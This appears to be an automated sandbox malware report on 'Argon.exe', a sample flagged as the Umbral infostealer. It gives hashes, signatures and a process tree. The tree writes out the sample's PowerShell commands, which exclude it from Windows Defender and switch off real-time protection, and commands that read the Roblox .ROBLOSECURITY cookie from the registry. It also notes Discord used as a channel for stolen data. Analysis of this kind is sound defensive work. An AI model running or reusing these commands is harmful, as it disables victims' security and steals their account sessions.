Overview
overview
10Static
static
10Pass 8864/...on.exe
windows10-ltsc 2021-x64
10Pass 8864/...on.exe
windows10-2004-x64
10Pass 8864/...re.dll
windows11-21h2-x64
1Pass 8864/...re.dll
windows10-2004-x64
1Pass 8864/...ms.dll
windows10-2004-x64
1Pass 8864/...ms.dll
windows10-2004-x64
1Pass 8864/...pf.dll
windows10-2004-x64
1Pass 8864/...pf.dll
windows10-2004-x64
1Pass 8864/...on.dll
windows11-21h2-x64
1Pass 8864/...on.dll
windows10-2004-x64
1Pass 8864/...is.dll
windows10-2004-x64
1Pass 8864/...is.dll
windows10-2004-x64
1Pass 8864/...4l.exe
windows10-2004-x64
1Pass 8864/...4l.exe
windows10-2004-x64
1Pass 8864/...it.bat
windows10-2004-x64
1Pass 8864/...it.bat
windows10-2004-x64
1Pass 8864/...ge.bat
windows11-21h2-x64
1Pass 8864/...ge.bat
windows10-2004-x64
1Pass 8864/...er.dll
windows10-2004-x64
1Pass 8864/...er.dll
windows10-2004-x64
1Analysis
-
max time kernel
99s -
max time network
142s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
26/12/2024, 17:52
Behavioral task
behavioral1
Sample
Pass 8864/Argon/Argon.exe
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral2
Sample
Pass 8864/Argon/Argon.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Pass 8864/Argon/Microsoft.Web.WebView2.Core.dll
Resource
win11-20241007-en
Behavioral task
behavioral4
Sample
Pass 8864/Argon/Microsoft.Web.WebView2.Core.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Pass 8864/Argon/Microsoft.Web.WebView2.WinForms.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
Pass 8864/Argon/Microsoft.Web.WebView2.WinForms.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Pass 8864/Argon/Microsoft.Web.WebView2.Wpf.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral8
Sample
Pass 8864/Argon/Microsoft.Web.WebView2.Wpf.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Pass 8864/Argon/Newtonsoft.Json.dll
Resource
win11-20241007-en
Behavioral task
behavioral10
Sample
Pass 8864/Argon/Newtonsoft.Json.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
Pass 8864/Argon/bin/Atlantis.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral12
Sample
Pass 8864/Argon/bin/Atlantis.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
Pass 8864/Argon/bin/oRniz4vtL94l.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral14
Sample
Pass 8864/Argon/bin/oRniz4vtL94l.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
Pass 8864/Argon/fix exploit.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral16
Sample
Pass 8864/Argon/fix exploit.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
Pass 8864/Argon/message.bat
Resource
win11-20241007-en
Behavioral task
behavioral18
Sample
Pass 8864/Argon/message.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
Pass 8864/Argon/runtimes/win-x64/native/WebView2Loader.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral20
Sample
Pass 8864/Argon/runtimes/win-x64/native/WebView2Loader.dll
Resource
win10v2004-20241007-en
General
-
Target
Pass 8864/Argon/Argon.exe
-
Size
229KB
-
MD5
0141daae60d7dd08a86fc4789cfb3689
-
SHA1
791d4a8f158313d355fad6dafa158407e80581bf
-
SHA256
d22b7b3b76496cda8bcad31dce4b2b3ab5ed3b91926d744982e492e5b39cf296
-
SHA512
74255f2cbb6345b4aefd7822587ca9503da2e49d41bb4306eca4e6ef96293b0f1c7e3173c8eb27aac54c1b0abebb8306d0e1d4b9aa824b153a8cd563a6640f9c
-
SSDEEP
6144:FloZM0rIkd8g+EtXHkv/iD4+2S86YXzQUp8aLLyuOb8e1msi8i:HoZDL+EP8+2S86YXzQUp8aLLylA
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/5488-1-0x000002059E7F0000-0x000002059E830000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5172 powershell.exe 5364 powershell.exe 4440 powershell.exe 5612 powershell.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 25 discord.com 26 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 232 wmic.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 3036 wmic.exe 3036 wmic.exe 3036 wmic.exe 3036 wmic.exe 5488 Argon.exe 5172 powershell.exe 5172 powershell.exe 5364 powershell.exe 5364 powershell.exe 4440 powershell.exe 4440 powershell.exe 4356 powershell.exe 4356 powershell.exe 640 wmic.exe 640 wmic.exe 640 wmic.exe 640 wmic.exe 2460 wmic.exe 2460 wmic.exe 2460 wmic.exe 2460 wmic.exe 3332 wmic.exe 3332 wmic.exe 3332 wmic.exe 3332 wmic.exe 5612 powershell.exe 5612 powershell.exe 232 wmic.exe 232 wmic.exe 232 wmic.exe 232 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5488 Argon.exe Token: SeIncreaseQuotaPrivilege 3036 wmic.exe Token: SeSecurityPrivilege 3036 wmic.exe Token: SeTakeOwnershipPrivilege 3036 wmic.exe Token: SeLoadDriverPrivilege 3036 wmic.exe Token: SeSystemProfilePrivilege 3036 wmic.exe Token: SeSystemtimePrivilege 3036 wmic.exe Token: SeProfSingleProcessPrivilege 3036 wmic.exe Token: SeIncBasePriorityPrivilege 3036 wmic.exe Token: SeCreatePagefilePrivilege 3036 wmic.exe Token: SeBackupPrivilege 3036 wmic.exe Token: SeRestorePrivilege 3036 wmic.exe Token: SeShutdownPrivilege 3036 wmic.exe Token: SeDebugPrivilege 3036 wmic.exe Token: SeSystemEnvironmentPrivilege 3036 wmic.exe Token: SeRemoteShutdownPrivilege 3036 wmic.exe Token: SeUndockPrivilege 3036 wmic.exe Token: SeManageVolumePrivilege 3036 wmic.exe Token: 33 3036 wmic.exe Token: 34 3036 wmic.exe Token: 35 3036 wmic.exe Token: 36 3036 wmic.exe Token: SeIncreaseQuotaPrivilege 3036 wmic.exe Token: SeSecurityPrivilege 3036 wmic.exe Token: SeTakeOwnershipPrivilege 3036 wmic.exe Token: SeLoadDriverPrivilege 3036 wmic.exe Token: SeSystemProfilePrivilege 3036 wmic.exe Token: SeSystemtimePrivilege 3036 wmic.exe Token: SeProfSingleProcessPrivilege 3036 wmic.exe Token: SeIncBasePriorityPrivilege 3036 wmic.exe Token: SeCreatePagefilePrivilege 3036 wmic.exe Token: SeBackupPrivilege 3036 wmic.exe Token: SeRestorePrivilege 3036 wmic.exe Token: SeShutdownPrivilege 3036 wmic.exe Token: SeDebugPrivilege 3036 wmic.exe Token: SeSystemEnvironmentPrivilege 3036 wmic.exe Token: SeRemoteShutdownPrivilege 3036 wmic.exe Token: SeUndockPrivilege 3036 wmic.exe Token: SeManageVolumePrivilege 3036 wmic.exe Token: 33 3036 wmic.exe Token: 34 3036 wmic.exe Token: 35 3036 wmic.exe Token: 36 3036 wmic.exe Token: SeDebugPrivilege 5172 powershell.exe Token: SeIncreaseQuotaPrivilege 5172 powershell.exe Token: SeSecurityPrivilege 5172 powershell.exe Token: SeTakeOwnershipPrivilege 5172 powershell.exe Token: SeLoadDriverPrivilege 5172 powershell.exe Token: SeSystemProfilePrivilege 5172 powershell.exe Token: SeSystemtimePrivilege 5172 powershell.exe Token: SeProfSingleProcessPrivilege 5172 powershell.exe Token: SeIncBasePriorityPrivilege 5172 powershell.exe Token: SeCreatePagefilePrivilege 5172 powershell.exe Token: SeBackupPrivilege 5172 powershell.exe Token: SeRestorePrivilege 5172 powershell.exe Token: SeShutdownPrivilege 5172 powershell.exe Token: SeDebugPrivilege 5172 powershell.exe Token: SeSystemEnvironmentPrivilege 5172 powershell.exe Token: SeRemoteShutdownPrivilege 5172 powershell.exe Token: SeUndockPrivilege 5172 powershell.exe Token: SeManageVolumePrivilege 5172 powershell.exe Token: 33 5172 powershell.exe Token: 34 5172 powershell.exe Token: 35 5172 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 5488 wrote to memory of 3036 5488 Argon.exe 82 PID 5488 wrote to memory of 3036 5488 Argon.exe 82 PID 5488 wrote to memory of 5172 5488 Argon.exe 85 PID 5488 wrote to memory of 5172 5488 Argon.exe 85 PID 5488 wrote to memory of 5364 5488 Argon.exe 88 PID 5488 wrote to memory of 5364 5488 Argon.exe 88 PID 5488 wrote to memory of 4440 5488 Argon.exe 90 PID 5488 wrote to memory of 4440 5488 Argon.exe 90 PID 5488 wrote to memory of 4356 5488 Argon.exe 92 PID 5488 wrote to memory of 4356 5488 Argon.exe 92 PID 5488 wrote to memory of 640 5488 Argon.exe 96 PID 5488 wrote to memory of 640 5488 Argon.exe 96 PID 5488 wrote to memory of 2460 5488 Argon.exe 99 PID 5488 wrote to memory of 2460 5488 Argon.exe 99 PID 5488 wrote to memory of 3332 5488 Argon.exe 101 PID 5488 wrote to memory of 3332 5488 Argon.exe 101 PID 5488 wrote to memory of 5612 5488 Argon.exe 103 PID 5488 wrote to memory of 5612 5488 Argon.exe 103 PID 5488 wrote to memory of 232 5488 Argon.exe 105 PID 5488 wrote to memory of 232 5488 Argon.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\Pass 8864\Argon\Argon.exe"C:\Users\Admin\AppData\Local\Temp\Pass 8864\Argon\Argon.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5488 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Pass 8864\Argon\Argon.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4356
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious behavior: EnumeratesProcesses
PID:640
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2460
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5612
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:232
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD560b3262c3163ee3d466199160b9ed07d
SHA1994ece4ea4e61de0be2fdd580f87e3415f9e1ff6
SHA256e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb
SHA512081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af
-
Filesize
948B
MD571a2894e51646537b85d31d6f7014625
SHA107d6e020c72cd94b2cbae2d5b8ac238278a56636
SHA2560c817dae2699f50343c50134d08b44ada35abca654cc805403624dbd4d4fb4f5
SHA512a4838e5d8704aab2653eafab26ef43ecded6b06b76000c2061e5b0347a3164619399bf3453f1fce2646a70fd7fb429477d31dfa01542d30ca57efe9084059b46
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
1KB
MD5e9e5ec06dc4a7619c5107166782579e1
SHA187fcd6b510a4ca8f970a1157ce8b6d7492e6c912
SHA256fc9dc76fcb25c0fbbe98ab154bd5b61d810f1d8fe87c70aeb7d51df1ed4ccdcd
SHA512e49718b17846f8c680f5904bc2d23ad2b619af5054aef91dc0f5fb6695d5909b809efd3577b990045e9be07a40eec7a8e98025cd8f42f0101a02dad5a0ff9aa9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82